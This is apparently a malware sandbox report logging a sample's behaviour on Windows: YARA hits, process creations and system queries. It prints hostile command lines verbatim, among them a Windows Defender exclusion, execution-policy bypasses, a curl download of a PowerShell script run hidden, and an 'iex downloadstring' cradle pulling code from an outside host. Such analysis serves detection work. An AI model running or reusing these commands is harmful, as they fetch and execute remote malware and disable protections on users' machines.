Source: Yara match File source: Process Memory Space: curl.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORYSTR
Source: Yara match File source: C:\Users\Public\Documents\vs1.ps1, type: DROPPED
Adds a directory exclusion to Windows Defender
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V" Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -win 1 - Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -command "$psakedir = ([array](dir """c:\users\user\desktop\vendor\packages\psake.*"""))[-1]; ".$psakedir\tools\psake.ps1" build.psake.ps1 -scriptpath "$psakedir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -command "$psakedir = ([array](dir """c:\users\user\desktop\vendor\packages\psake.*"""))[-1]; ".$psakedir\tools\psake.ps1" build.psake.ps1 -scriptpath "$psakedir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }" Jump to behavior
Source: powershell.exe, 00000004.00000002.30098453152.000001E7A2B4E000.00000004.00000800.00020000.00000000.sdmp, _kjfech8_Vi7.exe, 0000000B.00000002.29806435683.000000006C6D4000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: @Winapi@Windows@DOF_PROGMAN
Contains functionality to query locales information (e.g. system language)
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,_invoke_watson, 9_2_6FD8888A
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc, 9_2_6FD8871C
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s, 9_2_6FD886FD
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno, 9_2_6FD865F0
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP, 9_2_6FD885AC
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,_mbsnbicoll,strlen,EnumSystemLocalesA,strcpy_s,_invoke_watson, 9_2_6FD88468
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: strlen,EnumSystemLocalesA, 9_2_6FDFF42E
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: strlen,strlen,EnumSystemLocalesA, 9_2_6FDFF3C7
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,_stricmp,_stricmp, 9_2_6FDFF307
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,strlen,GetLocaleInfoA,_stricmp,strlen,_stricmp, 9_2_6FDFF136
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,strlen, 9_2_6FDFF0DB
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,_stricmp, 9_2_6FDFF034
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,_invoke_watson, 11_2_6FD8888A
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc, 11_2_6FD8871C
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s, 11_2_6FD886FD
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno, 11_2_6FD865F0
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP, 11_2_6FD885AC
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,_mbsnbicoll,strlen,EnumSystemLocalesA,strcpy_s,_invoke_watson, 11_2_6FD88468
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: strlen,EnumSystemLocalesA, 11_2_6FDFF42E
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: strlen,strlen,EnumSystemLocalesA, 11_2_6FDFF3C7
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,_stricmp,_stricmp, 11_2_6FDFF307
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,strlen,GetLocaleInfoA,_stricmp,strlen,_stricmp, 11_2_6FDFF136
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,strlen, 11_2_6FDFF0DB
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,_stricmp, 11_2_6FDFF034
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
